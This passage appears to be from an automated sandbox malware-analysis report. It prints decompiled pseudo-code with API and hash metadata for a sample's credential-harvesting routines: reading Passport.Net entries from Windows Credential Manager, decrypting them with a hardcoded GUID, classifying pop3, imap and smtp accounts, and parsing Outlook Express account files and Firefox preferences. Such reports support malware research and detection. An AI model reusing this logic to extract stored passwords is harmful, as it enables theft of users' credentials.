                                                                                              			}































                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$_memicmp
                                                                                              • String ID: user_pref("
                                                                                              • API String ID: 765841271-2487180061
                                                                                              • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                              • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                                              • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                              • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 61%
                                                                                              			E0040559F(intOrPtr _a4) {
                                                                                              				struct HWND__* _v12;
                                                                                              				signed int _v16;
                                                                                              				int _v20;
                                                                                              				int _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				int _v48;
                                                                                              				char* _v52;
                                                                                              				void* _v64;
                                                                                              				void _v319;
                                                                                              				char _v320;
                                                                                              				struct HWND__* _t53;
                                                                                              				intOrPtr* _t59;
                                                                                              				void* _t61;
                                                                                              				intOrPtr _t66;
                                                                                              				void* _t74;
                                                                                              				void* _t80;
                                                                                              				intOrPtr _t81;
                                                                                              				void* _t84;
                                                                                              				intOrPtr _t89;
                                                                                              				short _t91;
                                                                                              				signed int _t94;
                                                                                              				short* _t95;
                                                                                              				void* _t96;
                                                                                              				void* _t97;
                                                                                              
                                                                                              				_t89 = _a4;
                                                                                              				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
                                                                                              				_v12 = _t53;
                                                                                              				SendMessageA(_t53, 0x1009, 0, 0);
                                                                                              				SendMessageA(_v12, 0x1036, 0, 0x26);
                                                                                              				do {
                                                                                              				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
                                                                                              				_push(0xc8);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(_v12);
                                                                                              				_t80 = 6;
                                                                                              				E00404925(0x412466, _t80);
                                                                                              				_t59 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                              				_t81 =  *((intOrPtr*)(_t59 + 4));
                                                                                              				_t97 = _t96 + 0x10;
                                                                                              				_v32 = _t81;
                                                                                              				_v28 =  *_t59;
                                                                                              				_v20 = 0;
                                                                                              				if(_t81 <= 0) {
                                                                                              					L10:
                                                                                              					_t61 = 2;
                                                                                              					E004048B6(_t61, _v12, 0, _t61);
                                                                                              					return SetFocus(_v12);
                                                                                              				} else {
                                                                                              					goto L3;
                                                                                              				}
                                                                                              				do {
                                                                                              					L3:
                                                                                              					_v16 = 0;
                                                                                              					_v24 = 0;
                                                                                              					do {
                                                                                              						_t94 = _v16 << 2;
                                                                                              						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                                                              							_v320 = 0;
                                                                                              							memset( &_v319, 0, 0xff);
                                                                                              							_t97 = _t97 + 0xc;
                                                                                              							_v52 =  &_v320;
                                                                                              							_v64 = 4;
                                                                                              							_v48 = 0xff;
                                                                                              							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
                                                                                              								_push(_v16);
                                                                                              								_push(0);
                                                                                              								_push(_v12);
                                                                                              								_t84 = 5;
                                                                                              								_t74 = E0040496E( &_v320, _t84);
                                                                                              								_t95 = _t94 + _v28;
                                                                                              								_t91 =  *_t95;
                                                                                              								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
                                                                                              								_t97 = _t97 + 0x18;
                                                                                              								if(_t91 == 0) {
                                                                                              									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_v16 = _v16 + 1;
                                                                                              						_t66 = _v32;
                                                                                              						_v24 = _v24 + 0x14;
                                                                                              					} while (_v16 < _t66);
                                                                                              					_v20 = _v20 + 1;
                                                                                              				} while (_v20 < _t66);
                                                                                              				goto L10;
                                                                                              			}





























                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4281309102-0
                                                                                              • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                              • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                                              • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                              • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 64%
                                                                                              			E0040D5DB(char* __ebx, void* __eflags) {
                                                                                              				char _v8;
                                                                                              				short* _v12;
                                                                                              				int _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				char _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				char _v32;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				int _v56;
                                                                                              				char _v60;
                                                                                              				char _v584;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t36;
                                                                                              				intOrPtr _t44;
                                                                                              				void* _t47;
                                                                                              				char _t63;
                                                                                              				int _t69;
                                                                                              				void* _t74;
                                                                                              
                                                                                              				_t74 = __eflags;
                                                                                              				_t69 = 0;
                                                                                              				E004046D7( &_v584);
                                                                                              				_v60 = 0;
                                                                                              				_v56 = 0;
                                                                                              				_t36 = E00404647( &_v60, 0, _t74);
                                                                                              				_t75 = _t36;
                                                                                              				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
                                                                                              					_push( &_v8);
                                                                                              					_push(0);
                                                                                              					_push(4);
                                                                                              					_push("Passport.Net\\*");
                                                                                              					if(_v52() != 0) {
                                                                                              						_t44 = _v8;
                                                                                              						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
                                                                                              							_v32 =  *((intOrPtr*)(_t44 + 0x18));
                                                                                              							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
                                                                                              							_t47 = 0;
                                                                                              							_t63 = 0x4a;
                                                                                              							do {
                                                                                              								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
                                                                                              								 *(_t47 + 0x417768) =  *_t14 << 2;
                                                                                              								_t47 = _t47 + 2;
                                                                                              							} while (_t47 < _t63);
                                                                                              							_v24 = _t63;
                                                                                              							_v20 = 0x417768;
                                                                                              							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
                                                                                              								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
                                                                                              									strcpy(__ebx,  *(_v8 + 0x30));
                                                                                              									_t69 = 1;
                                                                                              								}
                                                                                              								LocalFree(_v12);
                                                                                              							}
                                                                                              							_t44 = _v8;
                                                                                              						}
                                                                                              						_v48(_t44);
                                                                                              					}
                                                                                              				}
                                                                                              				E004046C2( &_v60);
                                                                                              				E004047F1( &_v584);
                                                                                              				return _t69;
                                                                                              			}
























                                                                                              APIs
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                              • strlen.MSVCRT ref: 0040D6B7
                                                                                              • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                              • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                              • String ID: Passport.Net\*$hwA
                                                                                              • API String ID: 3335197805-2625321100
                                                                                              • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                              • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                                              • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                              • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 41%
                                                                                              			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                                                                              				int _v0;
                                                                                              				int _t26;
                                                                                              				char* _t32;
                                                                                              				int _t44;
                                                                                              				signed int _t46;
                                                                                              				signed int _t47;
                                                                                              
                                                                                              				_t38 = __ecx;
                                                                                              				_t47 = _t46 & 0xfffffff8;
                                                                                              				E004118A0(0x1040, __ecx);
                                                                                              				_t26 = GetMenuItemCount(_a8);
                                                                                              				_t44 = 0;
                                                                                              				_v0 = _t26;
                                                                                              				if(_t26 <= 0) {
                                                                                              					L13:
                                                                                              					return _t26;
                                                                                              				} else {
                                                                                              					goto L1;
                                                                                              				}
                                                                                              				do {
                                                                                              					L1:
                                                                                              					memset( &_a53, 0, 0x1000);
                                                                                              					_t47 = _t47 + 0xc;
                                                                                              					_a40 =  &_a52;
                                                                                              					_a4.cbSize = 0x30;
                                                                                              					_a8 = 0x36;
                                                                                              					_a44 = 0x1000;
                                                                                              					_a20 = 0;
                                                                                              					_a52 = 0;
                                                                                              					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
                                                                                              					if(_t26 == 0) {
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					if(_a52 == 0) {
                                                                                              						L10:
                                                                                              						_t55 = _a24;
                                                                                              						if(_a24 != 0) {
                                                                                              							_push(0);
                                                                                              							_push(_a24);
                                                                                              							_push(_a4.cbSize);
                                                                                              							_t26 = E00407EFB(_t38, _t55);
                                                                                              							_t47 = _t47 + 0xc;
                                                                                              						}
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					_t32 = strchr( &_a52, 9);
                                                                                              					if(_t32 != 0) {
                                                                                              						 *_t32 = 0;
                                                                                              					}
                                                                                              					_t33 = _a20;
                                                                                              					if(_a24 != 0) {
                                                                                              						if(_a12 == 0) {
                                                                                              							 *0x4171b4 =  *0x4171b4 + 1;
                                                                                              							_t33 =  *0x4171b4 + 0x11558;
                                                                                              							__eflags =  *0x4171b4 + 0x11558;
                                                                                              						} else {
                                                                                              							_t18 = _t44 + 0x11171; // 0x11171
                                                                                              							_t33 = _t18;
                                                                                              						}
                                                                                              					}
                                                                                              					_t26 = E00407EC3(_t33,  &_a52);
                                                                                              					_pop(_t38);
                                                                                              					goto L10;
                                                                                              					L12:
                                                                                              					_t44 = _t44 + 1;
                                                                                              				} while (_t44 < _v0);
                                                                                              				goto L13;
                                                                                              			}









                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 2300387033-3849865405
                                                                                              • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                              • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                                              • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                              • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 66%
                                                                                              			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v280;
                                                                                              				char _v408;
                                                                                              				intOrPtr _v412;
                                                                                              				char _v668;
                                                                                              				char _v796;
                                                                                              				intOrPtr _v800;
                                                                                              				char _v928;
                                                                                              				char _v940;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t37;
                                                                                              				void* _t44;
                                                                                              				intOrPtr _t50;
                                                                                              				void* _t56;
                                                                                              				intOrPtr _t58;
                                                                                              				void* _t63;
                                                                                              
                                                                                              				_t63 = __fp0;
                                                                                              				_t50 = __ecx;
                                                                                              				_v8 = __ecx;
                                                                                              				E004021D8( &_v940);
                                                                                              				_t58 = _a4;
                                                                                              				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
                                                                                              				_push(_t58 + 0x404);
                                                                                              				_t44 = 0x7f;
                                                                                              				E004060D0(_t44,  &_v796);
                                                                                              				E004060D0(_t44,  &_v408, _t58 + 0x204);
                                                                                              				E004060D0(_t44,  &_v928, _t58 + 4);
                                                                                              				E004060D0(_t44,  &_v668, _t58 + 0x104);
                                                                                              				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
                                                                                              				_t56 = _t58 + 0x504;
                                                                                              				_push("pop3");
                                                                                              				_push(_t56);
                                                                                              				L004115B2();
                                                                                              				if(_t37 != 0) {
                                                                                              					_push("imap");
                                                                                              					_push(_t56);
                                                                                              					L004115B2();
                                                                                              					if(_t37 != 0) {
                                                                                              						_push("smtp");
                                                                                              						_push(_t56);
                                                                                              						L004115B2();
                                                                                              						if(_t37 == 0) {
                                                                                              							_v412 = 4;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_v412 = 2;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_v412 = 1;
                                                                                              				}
                                                                                              				_v24 =  *((intOrPtr*)(_t58 + 0x804));
                                                                                              				_v20 =  *((intOrPtr*)(_t58 + 0x808));
                                                                                              				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
                                                                                              			}























                                                                                              APIs
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                                              • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp$memcpystrlen
                                                                                              • String ID: imap$pop3$smtp
                                                                                              • API String ID: 445763297-821077329
                                                                                              • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                              • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                                              • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                              • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                                                              				char _v5;
                                                                                              				char _v132;
                                                                                              				char _v404;
                                                                                              				char _v532;
                                                                                              				intOrPtr _v536;
                                                                                              				char _v920;
                                                                                              				intOrPtr _v924;
                                                                                              				char _v1052;
                                                                                              				char _v1064;
                                                                                              				void* __ebx;
                                                                                              				void* _t18;
                                                                                              				char* _t20;
                                                                                              				char* _t39;
                                                                                              				char* _t41;
                                                                                              				void* _t48;
                                                                                              				void* _t59;
                                                                                              
                                                                                              				_t59 = __fp0;
                                                                                              				_t48 = __edi;
                                                                                              				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
                                                                                              					return _t18;
                                                                                              				}
                                                                                              				_t39 =  &_v132;
                                                                                              				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
                                                                                              				if(_t20 != 0) {
                                                                                              					_v5 = 0;
                                                                                              					_t20 = strchr(_t39, 0x3a);
                                                                                              					_t41 = _t20;
                                                                                              					if(_t41 != 0) {
                                                                                              						 *_t41 = 0;
                                                                                              						E004021D8( &_v1064);
                                                                                              						strcpy( &_v404,  &(_t41[1]));
                                                                                              						strcpy( &_v532,  &_v132);
                                                                                              						_v924 = 7;
                                                                                              						_v536 = 3;
                                                                                              						if(strlen( &_v532) + 0xa < 0x7f) {
                                                                                              							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                                                              						}
                                                                                              						strcpy( &_v1052,  &_v532);
                                                                                              						_t20 = E00402407( &_v1064, _t59, _t48);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t20;
                                                                                              			}




















                                                                                              APIs
                                                                                                • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                                                • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                              • strchr.MSVCRT ref: 00403706
                                                                                              • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                                              • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                                              • strlen.MSVCRT ref: 0040375F
                                                                                              • sprintf.MSVCRT ref: 00403783
                                                                                              • strcpy.MSVCRT(?,?), ref: 00403799
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                              • String ID: %s@gmail.com
                                                                                              • API String ID: 2649369358-4097000612
                                                                                              • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                              • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                                              • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                              • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
                                                                                              				char _v8;
                                                                                              				void _v1031;
                                                                                              				void _v1032;
                                                                                              				void* _t26;
                                                                                              				char* _t27;
                                                                                              				int _t32;
                                                                                              				int _t38;
                                                                                              				char* _t43;
                                                                                              				int _t44;
                                                                                              				void* _t45;
                                                                                              				void** _t48;
                                                                                              				void* _t50;
                                                                                              				void* _t51;
                                                                                              
                                                                                              				_t43 = __ebx;
                                                                                              				_t44 = 0;
                                                                                              				_v1032 = 0;
                                                                                              				memset( &_v1031, 0, 0x3ff);
                                                                                              				_t26 = _a8;
                                                                                              				_t51 = _t50 + 0xc;
                                                                                              				 *__ebx = 0;
                                                                                              				if(_t26 > 0) {
                                                                                              					_t48 = _a4 + 4;
                                                                                              					_v8 = _t26;
                                                                                              					do {
                                                                                              						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
                                                                                              						_t32 = strlen( &_v1032);
                                                                                              						_a8 = _t32;
                                                                                              						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
                                                                                              						_t45 = _t44 + _a8 + 1;
                                                                                              						_t38 = strlen( *_t48);
                                                                                              						_a8 = _t38;
                                                                                              						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
                                                                                              						_t51 = _t51 + 0x30;
                                                                                              						_t48 =  &(_t48[2]);
                                                                                              						_t18 =  &_v8;
                                                                                              						 *_t18 = _v8 - 1;
                                                                                              						_t44 = _t45 + _a8 + 1;
                                                                                              					} while ( *_t18 != 0);
                                                                                              				}
                                                                                              				_t27 = _t44 + _t43;
                                                                                              				 *_t27 = 0;
                                                                                              				 *((char*)(_t27 + 1)) = 0;
                                                                                              				return _t43;
                                                                                              			}

















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$memsetsprintf
                                                                                              • String ID: %s (%s)
                                                                                              • API String ID: 3756086014-1363028141
                                                                                              • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                              • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                                              • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                              • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 25%
                                                                                              			E0040E906(void* __ebx, int _a4, void* _a8) {
                                                                                              				char _v20;
                                                                                              				char _v36;
                                                                                              				char _v52;
                                                                                              				void* _t15;
                                                                                              				void* _t17;
                                                                                              				void* _t28;
                                                                                              				intOrPtr* _t31;
                                                                                              				int _t32;
                                                                                              
                                                                                              				_t28 = __ebx;
                                                                                              				_t31 = __imp__UuidFromStringA;
                                                                                              				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
                                                                                              				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
                                                                                              				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t32 = _a4;
                                                                                              					if(_t32 > 0x7e) {
                                                                                              						_t32 = 0x7e;
                                                                                              					}
                                                                                              					memcpy(_t28, _a8, _t32);
                                                                                              					 *((char*)(_t28 + _t32)) = 0;
                                                                                              					__imp__CoTaskMemFree(_a8);
                                                                                              					return 1;
                                                                                              				}
                                                                                              			}












                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                              • memcpy.MSVCRT ref: 0040E966
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                              Strings
                                                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                              • API String ID: 1640410171-3316789007
                                                                                              • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                              • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                                              • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                              • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                              				void* _t12;
                                                                                              				void* _t15;
                                                                                              				char* _t19;
                                                                                              				void* _t25;
                                                                                              				void* _t28;
                                                                                              				long _t31;
                                                                                              
                                                                                              				_t12 = E00405ECB(_a8);
                                                                                              				_a8 = _t12;
                                                                                              				if(_t12 != 0xffffffff) {
                                                                                              					_t31 = GetFileSize(_t12, 0);
                                                                                              					_t37 = _t31 - 2;
                                                                                              					if(_t31 > 2) {
                                                                                              						_t3 = _t31 + 2; // 0x2
                                                                                              						_t15 = _t3;
                                                                                              						L004115D0();
                                                                                              						_t25 = _t15;
                                                                                              						_t28 = _t15;
                                                                                              						SetFilePointer(_a8, 2, 0, 0);
                                                                                              						_t5 = _t31 - 2; // -2
                                                                                              						E004066F6(_t25, _a8, _t28, _t5);
                                                                                              						_t19 = _t28 + _t31;
                                                                                              						 *((char*)(_t19 - 2)) = 0;
                                                                                              						 *((char*)(_t19 - 1)) = 0;
                                                                                              						 *_t19 = 0;
                                                                                              						E00410A8A(_t25, _t37, _a4, _t28);
                                                                                              						_push(_t28);
                                                                                              						L004115D6();
                                                                                              					}
                                                                                              					return CloseHandle(_a8);
                                                                                              				}
                                                                                              				return _t12;
                                                                                              			}










                                                                                              APIs
                                                                                                • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                                                • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                                                • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                                                • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                                                                • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                                                • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                                                              • CloseHandle.KERNEL32(?), ref: 00410C37
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
